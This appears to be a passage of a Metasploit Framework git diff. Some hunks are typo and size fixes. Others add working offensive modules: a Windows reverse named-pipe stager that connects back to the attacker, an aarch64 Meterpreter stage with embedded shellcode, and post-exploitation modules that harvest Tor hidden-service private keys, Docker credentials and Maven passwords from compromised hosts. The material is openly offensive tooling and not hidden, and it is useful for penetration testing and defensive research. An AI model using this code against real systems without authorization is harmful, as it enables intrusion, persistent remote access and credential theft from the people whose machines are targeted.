include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb index 8e705c5c07..290e3b936f 100644 --- a/modules/payloads/stagers/php/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1362 + CachedSize = 1512 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index a532fbaee0..3298b70837 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp' module MetasploitModule - CachedSize = 966 + CachedSize = 1116 include Msf::Payload::Stager include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb index 6316652d79..0d2d5337ed 100644 --- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp' module MetasploitModule - CachedSize = 1140 + CachedSize = 1290 include Msf::Payload::Stager include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/stagers/windows/reverse_named_pipe.rb b/modules/payloads/stagers/windows/reverse_named_pipe.rb new file mode 100644 index 0000000000..ae3ef3d1b2 --- /dev/null +++ b/modules/payloads/stagers/windows/reverse_named_pipe.rb @@ -0,0 +1,31 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_named_pipe' +require 'msf/core/payload/windows/reverse_named_pipe' + +module MetasploitModule + + CachedSize = 276 + + include Msf::Payload::Stager + include Msf::Payload::Windows::ReverseNamedPipe + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows x86 Reverse Named Pipe (SMB) Stager', + 'Description' => 'Connect back to the attacker via a named pipe pivot', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Handler' => Msf::Handler::ReverseNamedPipe, + 'Arch' => ARCH_X86, + 'Convention' => 'handleedi', + 'Stager' => { 'RequiresMidstager' => false } + )) + end + +end + diff --git a/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb b/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb new file mode 100644 index 0000000000..925ea4059b --- /dev/null +++ b/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb @@ -0,0 +1,30 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_named_pipe' +require 'msf/core/payload/windows/x64/reverse_named_pipe' + +module MetasploitModule + + CachedSize = 421 + + include Msf::Payload::Stager + include Msf::Payload::Windows::ReverseNamedPipe_x64 + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows x64 Reverse Named Pipe (SMB) Stager', + 'Description' => 'Connect back to the attacker via a named pipe pivot', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseNamedPipe, + 'Platform' => 'win', + 'Arch' => ARCH_X64, + 'Convention' => 'handlerdi', + 'Stager' => { 'RequiresMidstager' => false } + )) + end + +end diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb new file mode 100644 index 0000000000..ec2b24435f --- /dev/null +++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb @@ -0,0 +1,118 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/base/sessions/meterpreter_aarch64_linux' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'rex/elfparsey' + +module MetasploitModule + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter', + 'Description' => 'Inject the mettle server payload (staged)', + 'Author' => [ + 'Adam Cammack ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux + ) + ) + end + + def elf_ep(payload) + elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload)) + elf.elf_header.e_entry + end + + def handle_intermediate_stage(conn, payload) + entry_offset = elf_ep(payload) + + # Generated from external/source/shellcode/linux/aarch64/stage_mettle.s + midstager = [ + + 0x10000782, # adr x2, f0 + 0xb9400042, # ldr w2, [x2] + 0xaa0203ea, # mov x10, x2 + 0xd34cfc42, # lsr x2, x2, #12 + 0x91000442, # add x2, x2, #0x1 + 0xd374cc42, # lsl x2, x2, #12 + 0xaa1f03e0, # mov x0, xzr + 0xaa0203e1, # mov x1, x2 + 0xd28000e2, # mov x2, #0x7 // #7 + 0xd2800443, # mov x3, #0x22 // #34 + 0xaa1f03e4, # mov x4, xzr + 0xaa1f03e5, # mov x5, xzr + 0xd2801bc8, # mov x8, #0xde // #222 + 0xd4000001, # svc #0x0 + 0xaa0a03e4, # mov x4, x10 + 0xaa0003e3, # mov x3, x0 + 0xaa0003ea, # mov x10, x0 + 0xaa0c03e0, # mov x0, x12 + 0xaa0303e1, # mov x1, x3 + 0xaa0403e2, # mov x2, x4 + 0xd28007e8, # mov x8, #0x3f // #63 + 0xd4000001, # svc #0x0 + 0x34000440, # cbz w0, e0 + 0x8b000063, # add x3, x3, x0 + 0xeb000084, # subs x4, x4, x0 + 0x54ffff01, # b.ne 44 + 0x10000480, # adr x0, f8 + 0xf9400000, # ldr x0, [x0] + 0x8b0a0000, # add x0, x0, x10 + 0xaa0003ee, # mov x14, x0 + 0x910003e0, # mov x0, sp + 0x927cec1f, # and sp, x0, #0xfffffffffffffff0 + 0x910183ff, # add sp, sp, #0x60 + 0xd2800040, # mov x0, #0x2 // #2 + 0xd2800da1, # mov x1, #0x6d // #109 + 0xf90003e1, # str x1, [sp] + 0x910003e1, # mov x1, sp + 0xaa0c03e2, # mov x2, x12 + 0xd2800003, # mov x3, #0x0 // #0 + 0xd2800004, # mov x4, #0x0 // #0 + 0xd28000e5, # mov x5, #0x7 // #7 + 0xaa0a03e6, # mov x6, x10 + 0xd28000c7, # mov x7, #0x6 // #6 + 0xd2820008, # mov x8, #0x1000 // #4096 + 0xd2800329, # mov x9, #0x19 // #25 + 0xaa0a03ea, # mov x10, x10 + 0xd280000b, # mov x11, #0x0 // #0 + 0xa9bf2fea, # stp x10, x11, [sp,#-16]! + 0xa9bf27e8, # stp x8, x9, [sp,#-16]! + 0xa9bf1fe6, # stp x6, x7, [sp,#-16]! + 0xa9bf17e4, # stp x4, x5, [sp,#-16]! + 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! + 0xa9bf07e0, # stp x0, x1, [sp,#-16]! + 0xd280001d, # mov x29, #0x0 // #0 + 0xd280001e, # mov x30, #0x0 // #0 + 0xd61f01c0, # br x14 + 0xd2800000, # mov x0, #0x0 // #0 + 0xd2800ba8, # mov x8, #0x5d // #93 + 0xd4000001, # svc #0x0 + 0xd503201f, # nop + payload.length, + 0x00000000, # .word 0x00000000 + entry_offset, + 0x00000000, # .word 0x00000000 + ].pack('V*') + + print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)") + conn.put([midstager.length].pack('V')) + conn.put(midstager) == midstager.length + end + + def generate_stage(opts = {}) + MetasploitPayloads::Mettle.new('aarch64-linux-musl', + generate_config(opts.merge({scheme: 'tcp'}))).to_binary :process_image + end +end diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb index 5128e74dcf..2774a9a7ee 100644 --- a/modules/payloads/stages/windows/meterpreter.rb +++ b/modules/payloads/stages/windows/meterpreter.rb @@ -23,8 +23,8 @@ module MetasploitModule super(update_info(info, 'Name' => 'Windows Meterpreter (Reflective Injection)', 'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)', - 'Author' => ['skape','sf'], - 'PayloadCompat' => { 'Convention' => 'sockedi'}, + 'Author' => ['skape', 'sf', 'OJ Reeves'], + 'PayloadCompat' => { 'Convention' => 'sockedi handleedi http https'}, 'License' => MSF_LICENSE, 'Session' => Msf::Sessions::Meterpreter_x86_Win )) diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb index 1abdb6c8ce..de790efebf 100644 --- a/modules/payloads/stages/windows/x64/meterpreter.rb +++ b/modules/payloads/stages/windows/x64/meterpreter.rb @@ -23,8 +23,8 @@ module MetasploitModule super(update_info(info, 'Name' => 'Windows Meterpreter (Reflective Injection x64)', 'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64)', - 'Author' => ['skape','sf', 'OJ Reeves'], - 'PayloadCompat' => { 'Convention' => 'sockrdi', }, + 'Author' => ['skape', 'sf', 'OJ Reeves'], + 'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi http https'}, 'License' => MSF_LICENSE, 'Session' => Msf::Sessions::Meterpreter_x64_Win)) end diff --git a/modules/post/hardware/automotive/getvinfo.rb b/modules/post/hardware/automotive/getvinfo.rb index dd310bf516..d387e929b5 100644 --- a/modules/post/hardware/automotive/getvinfo.rb +++ b/modules/post/hardware/automotive/getvinfo.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Post OptInt.new('SRCID', [true, "Module ID to query", 0x7e0]), OptInt.new('DSTID', [false, "Expected reponse ID, defaults to SRCID + 8", 0x7e8]), OptInt.new('PADDING', [false, "Optinal end of packet padding", nil]), + OptBool.new('FC', [false, "Optinal forces flow control", nil]), OptBool.new('CLEAR_DTCS', [false, "Clear any DTCs and reset MIL if errors are present", false]), OptString.new('CANBUS', [false, "CAN Bus to perform scan on, defaults to connected bus", nil]) ]) @@ -33,6 +34,7 @@ class MetasploitModule < Msf::Post def run opt = {} opt['PADDING'] = datastore["PADDING"] if datastore["PADDING"] + opt['FC'] = datastore['FC'] if datastore['FC'] pids = get_current_data_pids(datastore["CANBUS"], datastore["SRCID"], datastore["DSTID"], opt) if pids.size == 0 print_status("No reported PIDs. You may not be properly connected") diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb index db4dcdf0ac..af48869d8c 100644 --- a/modules/post/linux/busybox/jailbreak.rb +++ b/modules/post/linux/busybox/jailbreak.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Post super( 'Name' => 'BusyBox Jailbreak ', 'Description' => %q{ - This module will send a set of commands to a open session that is connected to a + This module will send a set of commands to an open session that is connected to a BusyBox limited shell (i.e. a router limited shell). It will try different known tricks to jailbreak the limited shell and get a full BusyBox shell. }, diff --git a/modules/post/linux/dos/xen_420_dos.rb b/modules/post/linux/dos/xen_420_dos.rb index 520d0daf88..0d63e6ac5b 100644 --- a/modules/post/linux/dos/xen_420_dos.rb +++ b/modules/post/linux/dos/xen_420_dos.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Linux DoS Xen 4.2.0 2012-5525', 'Description' => %q( This module causes a hypervisor crash in Xen 4.2.0 when invoked from a - paravirtualised VM, including from dom0. Successfully tested on Debian 7 + paravirtualized VM, including from dom0. Successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0.), 'References' => [ ['CVE', '2012-5525'] ], 'License' => MSF_LICENSE, diff --git a/modules/post/linux/gather/tor_hiddenservices.rb b/modules/post/linux/gather/tor_hiddenservices.rb new file mode 100644 index 0000000000..5ab4c55671 --- /dev/null +++ b/modules/post/linux/gather/tor_hiddenservices.rb @@ -0,0 +1,103 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +# Adapted from post/linux/gather/enum_configs.rb +## + +class MetasploitModule < Msf::Post + + include Msf::Post::Linux::System + include Msf::Post::Linux::Priv + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Linux Gather TOR Hidden Services', + 'Description' => %q{ + This module collects the hostnames name and private keys of + any TOR Hidden Services running on the target machine. It + will search for torrc and if found, will parse it for the + directories of Hidden Services. However, root permissions + are required to read them as they are owned by the user that + TOR runs as, usually a separate account. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Harvey Phillips ', + ], + 'Platform' => ['linux'], + 'SessionTypes' => ['shell', 'meterpreter'] + )) + end + + def run + distro = get_sysinfo + h = get_host + print_status("Running module against #{h}") + print_status("Info:") + print_status("\t#{distro[:version]}") + print_status("\t#{distro[:kernel]}") + print_status("Looking for torrc...") + find_torrc + end + + def save(file, data, ltype, ctype="text/plain") + fname = ::File.basename(file) + loot = store_loot(ltype, ctype, session, data, fname) + print_status("#{fname} stored in #{loot.to_s}") + end + + def get_host + case session.type + when /meterpreter/ + host = sysinfo["Computer"] + when /shell/ + host = cmd_exec("hostname").chomp + end + + return host + end + + def find_torrc + config = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n") + if config.length == 0 + print_error ("No torrc file found, maybe it goes by a different name?") + else + hidden = Array.new + # For every torrc file found, parse them for HiddenServiceDir + config.each do |c| + print_good("Torrc file found at #{c}") + services = cmd_exec("cat #{c} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n") + # For each HiddenServiceDir found in the torrc(s), push them to the hidden array + services.each do |s| + hidden.push(s) + end + end + # Remove any duplicate entries + hidden = hidden.uniq + # If hidden is empty, then no Hidden Services are running. + if hidden.length != 0 + print_good("#{hidden.length} hidden services have been found!") + else + print_bad("No hidden services were found!") + end + + if is_root? + # For all the Hidden Services found, loot hostname file + hidden.each do |f| + output = read_file("#{f}hostname") + save(f, output, "tor.#{f.split("/")[-1]}.hostname") if output && output !~ /No such file or directory/ + end + + # For all the Hidden Services found, loot private_key file + hidden.each do |f| + output = read_file("#{f}private_key") + save(f, output, "tor.#{f.split("/")[-1]}.privatekey") if output && output !~ /No such file or directory/ + end + else + print_error("Hidden Services were found, but we need root to access the directories") + end + end + end +end diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index dcd44542ef..826aa5f99f 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these - filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. + filenames to /etc/passwd, then sending a packet with a privileged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 8652558413..2a66d4a693 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post super( update_info( info, 'Name' => 'Multi Gather DNS Service Record Lookup Scan', 'Description' => %q{ - Enumerates know SRV Records for a given domaon using target host DNS query tool. + Enumerates known SRV Records for a given domain using target host DNS query tool. }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post register_options( [ - OptString.new('DOMAIN', [true, 'Domain ro perform SRV query against.']) + OptString.new('DOMAIN', [true, 'Domain to perform SRV query against.']) ]) end diff --git a/modules/post/multi/gather/docker_creds.rb b/modules/post/multi/gather/docker_creds.rb new file mode 100644 index 0000000000..107bb7b829 --- /dev/null +++ b/modules/post/multi/gather/docker_creds.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'json' + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Unix + + def initialize(info={}) + super( update_info(info, + 'Name' => 'Multi Gather Docker Credentials Collection', + 'Description' => %q{ + This module will collect the contents of all users' .docker directories on the targeted + machine. If the user has already push to docker hub, chances are that the password was + saved in base64 (default behavior). + }, + 'License' => MSF_LICENSE, + 'Author' => ['Flibustier'], + 'Platform' => %w{ bsd linux osx unix }, + 'SessionTypes' => ['shell'] + )) + end + + # This module is largely based on gpg_creds.rb. + + def run + print_status("Finding .docker directories") + paths = enum_user_directories.map {|d| d + "/.docker"} + # Array#select! is only in 1.9 + paths = paths.select { |d| directory?(d) } + + if paths.nil? || paths.empty? + print_error("No users found with a .docker directory") + return + end + + download_loot(paths) + end + + def download_loot(paths) + print_status("Looting #{paths.count} directories") + paths.each do |path| + path.chomp! + file = "config.json" + target = "#{path}/#{file}" + + if file? target + print_status("Downloading #{target} -> #{file}") + extract(target) + end + end + end + + def extract(target) + file = read_file(target) + parsed = JSON.parse(file) + if parsed["auths"] + parsed["auths"].each do |key, value| + vprint_status("key: #{key}") + value.each do |k,v| + if k == "auth" + plain = Rex::Text.decode_base64(v) + if plain.include? ":" + + print_good("Found #{plain}") + username, password = plain.split(':') + credential_data = { + origin_type: :import, + module_fullname: self.fullname, + filename: target, + workspace_id: myworkspace_id, + service_name: 'docker', + realm_value: key, + realm_key: Metasploit::Model::Realm::Key::WILDCARD, + private_type: :password, + private_data: password, + username: username + } + create_credential(credential_data) + + print_good("Saved credentials") + end + end + end + end + else + print_status("No credentials found in config file") + end + end +end diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index 3f1e1ecd9e..d4208723b5 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module will attempt to enumerate any VirtualBox VMs on the target machine. Due to the nature of VirtualBox, this module can only enumerate VMs registered - for the current user, thereforce, this module needs to be invoked from a user context. + for the current user, therefore, this module needs to be invoked from a user context. }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb index 611addd134..e383640ebb 100644 --- a/modules/post/multi/gather/gpg_creds.rb +++ b/modules/post/multi/gather/gpg_creds.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Post # Array#select! is only in 1.9 paths = paths.select { |d| directory?(d) } - if paths.nil? or paths.empty? + if paths.nil? || paths.empty? print_error("No users found with a .gnupg directory") return end @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Post if directory?(target) next end - print_status("Downloading #{path}#{sep}#{file} -> #{file}") + print_status("Downloading #{target} -> #{file}") data = read_file(target) file = file.split(sep).last type = file.gsub(/\.gpg.*/, "").gsub(/gpg\./, "") diff --git a/modules/post/multi/gather/maven_creds.rb b/modules/post/multi/gather/maven_creds.rb new file mode 100644 index 0000000000..e6d278d43f --- /dev/null +++ b/modules/post/multi/gather/maven_creds.rb @@ -0,0 +1,150 @@ + +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'nokogiri' + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Unix + + def initialize(info={}) + super( update_info(info, + 'Name' => 'Multi Gather Maven Credentials Collection', + 'Description' => %q{ + This module will collect the contents of all users settings.xml on the targeted + machine. + }, + 'License' => MSF_LICENSE, + 'Author' => ['elenoir'], + 'Platform' => %w{ bsd linux osx unix win }, + 'SessionTypes' => ['shell','meterpreter'] + )) + end + + def gathernix + print_status("Unix OS detected") + files = cmd_exec('locate settings.xml').split("\n") + # Handle case where locate does not exist (error is returned in first element) + if files.length == 1 && !directory?(files.first) + files = [] + paths = enum_user_directories.map {|d| d} + if paths.nil? || paths.empty? + print_error("No users directory found") + return + end + paths.each do |path| + path.chomp! + file = "settings.xml" + target = "#{path}/#{file}" + if file? target + files.push(target) + end + end + end + return files + end + + def gatherwin + print_status("Windows OS detected") + return cmd_exec('cd\ && dir settings.xml /b /s').split("\n") + end + + def run + print_status("Finding user directories") + files = "" + case session.platform + when 'windows' + files = gatherwin + when 'unix', 'linux', 'bsd', 'osx' + files = gathernix + else + print_error("Incompatible platform") + end + if files.nil? || files.empty? + print_error("No settings.xml file found") + return + end + download_loot(files) + end + + def download_loot(files) + print_status("Looting #{files.count} files") + files.each do |target| + target.chomp! + if file? target + print_status("Downloading #{target}") + extract(target) + end + end + end + + def parse_settings(target, data) + xml_doc = Nokogiri::XML(data) + xml_doc.remove_namespaces! + + xml_doc.xpath("//server").each do |server| + id = server.xpath("id").text + username = server.xpath("username").text + password = server.xpath("password").text + + print_status("Collected the following credentials:") + print_status(" Id: %s" % id) + print_status(" Username: %s" % username) + print_status(" Password: %s" % password) + + print_status("Try to find url from id...") + realm = "" + + xml_doc.xpath("//mirror[id = '#{id}']").each do |mirror| + realm = mirror.xpath("url").text + print_status("Found url in mirror : #{realm}") + end + + if realm.blank? + xml_doc.xpath("//repository[id = '#{id}']").each do |repository| + realm = repository.xpath("url").text + print_status("Found url in repository : #{realm}") + end + end + + if realm.blank? + print_status("No url found, id will be set as realm") + realm = id + end + + print_line("") + + credential_data = { + origin_type: :import, + module_fullname: self.fullname, + filename: target, + service_name: 'maven', + realm_value: realm, + realm_key: Metasploit::Model::Realm::Key::WILDCARD, + private_type: :password, + private_data: password, + username: username, + workspace_id: myworkspace_id + } + create_credential(credential_data) + end + end + + def extract(target) + print_status("Reading settings.xml file from #{target}") + data = "" + if session.type == "shell" + data = session.shell_command("cat #{target}") + else + settings = session.fs.file.new("#{target}", "rb") + until settings.eof? + data << settings.read + end + end + + parse_settings(target, data) + end +end diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index 105a618139..d42e996b47 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb +++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for offline decryption with third party tools. - If necessary, you may also set the PARSE optioin to true to parse the sqlite + If necessary, you may also set the PARSE option to true to parse the sqlite file, which contains sensitive information such as the encrypted username/password. However, this feature is not enabled by default, because it requires SQLITE3 gem to be installed on your machine. diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 53f2aadcdf..c19958a2ec 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Multi Manage System Remote TCP Shell Session', 'Description' => %q{ This module will create a Reverse TCP Shell on the target system - using the system own scripting enviroments installed on the + using the system's own scripting environments installed on the target. }, 'License' => MSF_LICENSE, @@ -55,7 +55,7 @@ class MetasploitModule < Msf::Post end if not cmd.empty? - print_status("Executing reverse tcp shel to #{lhost} on port #{lport}") + print_status("Executing reverse tcp shell to #{lhost} on port #{lport}") cmd_exec("(#{cmd} &)") end end diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index 54694a1dc8..fc7a2f84de 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module will download the "Chicken of the VNC" client application's profile file, which is used to store other VNC servers' information such - as as the IP and password. + as the IP and password. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb index 2cae840a30..a612592da9 100644 --- a/modules/post/osx/gather/enum_keychain.rb +++ b/modules/post/osx/gather/enum_keychain.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post This module presents a way to quickly go through the current user's keychains and collect data such as email accounts, servers, and other services. Please note: when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication - alert flash briefly on their screen that gets dismissed by a programatically triggered click. + alert flash briefly on their screen that gets dismissed by a programmatically triggered click. }, 'License' => MSF_LICENSE, 'Author' => [ 'ipwnstuff ', 'joev' ], diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 2a8b233aa9..d60051d58f 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post to find the credential for Gmail. The Gmail's last session state may contain the user's credential if his/her first login attempt failed (likely due to a typo), and then the page got refreshed or another login attempt was made. This also means - the stolen credential might contains typos. + the stolen credential might contain typos. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index 777e80720c..4e690f439d 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This - module supports detectoin of Solaris Zone, VMWare, VirtualBox, Xen, + module supports detection of Solaris Zone, VMWare, VirtualBox, Xen, and QEMU/KVM.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index fc9151819d..8f2decf674 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This - module supports detectoin of Hyper-V, VMWare, Virtual PC, + module supports detection of Hyper-V, VMWare, Virtual PC, VirtualBox, Xen, and QEMU. }, 'License' => MSF_LICENSE, diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index 18c47ac40b..ce33d25421 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Windows Gather FlashFXP Saved Password Extraction', 'Description' => %q{ - This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It + This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It finds saved FTP connections in the Sites.dat file. }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index abaa9efc3e..4b3c8646eb 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Windows Gather Enumerate Active Domain Users', 'Description' => %q{ This module will enumerate computers included in the primary Domain and attempt - to list all locations the targeted user has sessions on. If a the HOST option is specified + to list all locations the targeted user has sessions on. If the HOST option is specified the module will target only that host. If the HOST is specified and USER is set to nil, all users logged into that host will be returned.' }, diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 5ea88c3426..055b7e423d 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -9,7 +9,7 @@ class MetasploitModule < Msf::Post super( update_info(info, 'Name' => 'Windows Gather Process Memory Grep', 'Description' => %q{ - This module allows for searching the memory space of a proccess for potentially + This module allows for searching the memory space of a process for potentially sensitive data. Please note: When the HEAP option is enabled, the module will have to migrate to the process you are grepping, and will not migrate back automatically. This means that if the user terminates the application after using this module, you diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index ca66a3368e..14e7ca288a 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module adds a user to the Domain and/or to a Domain group. It will check if sufficient privileges are present for certain actions and run - getprivs for system. If you elevated privs to system,the + getprivs for system. If you elevated privs to system, the SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to a process that is running as system. If you don't have privs, this script exits. diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index b8e0fbdfc6..1ecc197401 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -10,33 +10,43 @@ class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File - def initialize(info={}) - super( update_info( info, - 'Name' => 'Windows Manage Enable Remote Desktop', - 'Description' => %q{ - This module enables the Remote Desktop Service (RDP). It provides the options to create - an account and configure it to be a member of the Local Administrators and - Remote Desktop Users group. It can also forward the target's port 3389/tcp.}, - 'License' => BSD_LICENSE, - 'Author' => [ 'Carlos Perez '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ] - )) + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows Manage Enable Remote Desktop', + 'Description' => %q{ + This module enables the Remote Desktop Service (RDP). It provides the options to create + an account and configure it to be a member of the Local Administrators and + Remote Desktop Users group. It can also forward the target's port 3389/tcp.}, + 'License' => BSD_LICENSE, + 'Author' => [ 'Carlos Perez '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + 